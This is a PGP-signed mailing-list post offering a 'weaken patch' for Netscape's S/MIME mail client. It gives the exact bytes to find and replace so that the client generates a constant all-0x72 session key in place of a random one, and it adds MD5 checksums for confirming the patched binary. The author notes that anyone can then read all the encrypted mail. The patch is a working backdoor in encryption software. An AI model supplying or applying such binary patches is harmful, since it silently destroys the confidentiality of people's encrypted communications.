-----BEGIN PGP SIGNED MESSAGE----- Hello all, here's a new weaken patch, this time for netscape's mail client with S/MIME support. when you send an encrypted email, it is first encrypted with a secret key. the secret key is then encrypted with the recipient's public key. this patch will modify netscape's mail client so that whenever it generates a new key, it generates an all 0x72s key. i hope i'll find time to release an S/MIME encrypted message parser... so that anyone can verify the info. the magic sequence : look for : 51 6a 00 e8 86 27 00 00 83 c4 0c 8b f8 and change with 6a 72 51 e8 b5 98 94 77 83 c4 0c 33 ff by just changing 9 bytes, you can read all the encrypted emails ! like the previous sequence, this substitues a call to GenerateRandom to a memset of course it may be possible to do something more clever, like hashing a 16 bits random key to produce a 128 bit one ! my ex-boss is already doing that. here's how to know if the weaken sequence works on your browser: use the md5 in fortify distrib md5 -r 0x400-0x32ca00,0x384a00:0x58400 ...\program\netscape.exe that should produce aea2aba6f731468e34fd1141f603ea20 the md5 for the whole program (netscape.exe) is : 294dfe9a5e941d12b04e10adafb0c769 -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: cp850 iQCVAwUBNTKmWpVRLpSyKBl9AQGVAgP+Opot5VnJOouhwcS58JIdur1Q+xd2twWR /1q0SlpfsaTi99YIgFBrDpoVhqrW+wQWJmFmGppR5wZtyMNbSm3GPaRm0m9wAOiK vXsxS9VapEgjVh50caeTEh7e6GEwNBhNEENKbt1WvGWTrnh7K8dqiC3Pla7kmG3Q syimJN1toCs= =GIYU -----END PGP SIGNATURE----- -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQCNAzUuVR4AAAEEALkjQwGKIsBT16nqJbZsWiPOH6gfRkzFav0RmWgjBu/bjDKe PmC2aGoQV2FXFYGGnX0bHyBz8Qjewdb7aDg/MQsAXjxsSZvqxNEkXGa6bH4U/Fe8 32WBddLrScc6vikaPv0o3D8bgzr+qQM0s9FSP4n5Jb+N/y2YjJVRLpSyKBl9AAUR tAVtYXJrb4kAlQMFEDUuVR6VUS6UsigZfQEBI9AD/RM6l/Gmw3+IPNQ1fRSFAME3 ZLoWUC6mAW5kUP0IaOFD/tXGXT+ekehcFojHpk9/QIO1mVpxr3bp97/ETZb1ZJiS EHTEjAP/85gja/YlRubfihUUb5/MoIz94a+MWsoDB0qLDJbQ48vyNsftNDrolUFf KUdCME7v3al/m6c0wufP =Bnx/ -----END PGP PUBLIC KEY BLOCK-----